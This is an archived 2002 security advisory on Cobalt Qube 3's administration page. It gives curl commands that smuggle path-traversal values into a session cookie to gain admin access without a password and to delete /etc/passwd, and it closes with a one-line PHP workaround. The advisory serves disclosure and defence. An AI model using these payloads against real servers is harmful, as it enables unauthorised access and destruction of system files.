25th Jul 2002 [SBWID-5558]
COMMAND
Cobalt Qube administration page various vulns
SYSTEMS AFFECTED
Cobalt Qube 3 (Cobalt Linux release 6.0 (Carmel)Kernel 2.2.16C7 on
i586)
PROBLEM
pokleyzz [pokleyzz@scan-associates.net], sk [sk@scan-associates.net]
and shaharil [shaharil@scan-associates.net] of scan-associates
[http://www.scan-associates.net] found :
Problem 1: Local Privilege Escalation to Admin
Any user with ability to create file in any location of a Cobalt server
will be able to promote to Admin access of the System Management. A
user may create a file in /tmp/test and crafted a cookie to login as
Admin without password:
Create dummy session file in Cobalt server:
$ printf "admin" > /tmp/test
Login without password from anywhere:
$ curl -b sessionId=/../../../../../../tmp/test\;loginName=admin
http://192.168.0.1:444/splashAdmin.php
Problem 2: Remote User access
We also found out that if the User account is newly created, we can
bypass the authentication without a need to create dummy session file
in the server:
$curl -b sessionId=../codb/objects/4/.name\;loginName=admin
http://192.168.0.1:444/splashAdmin.php
Problem 3: Remotely delete file
It is possible to delete file from the server by specifying the path to
the file and the first 31 characters of the file. The following example
will delete the /etc/passwd file from the server:
$curl -b
sessionId=../../../../../../../../etc/passwd\;loginName=root:x:0:0:root:/root:/bin/bash
http://192.168.0.1:444/splashAdmin.php
note : curl can be download from http://curl.haxx.se/download.html
SOLUTION
Workaround
==========
In /usr/sausalito/ui/libPhp/ServerScriptHelper.php
line 64:
$sessionId = ereg_replace("\.\.","",$sessionId);
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH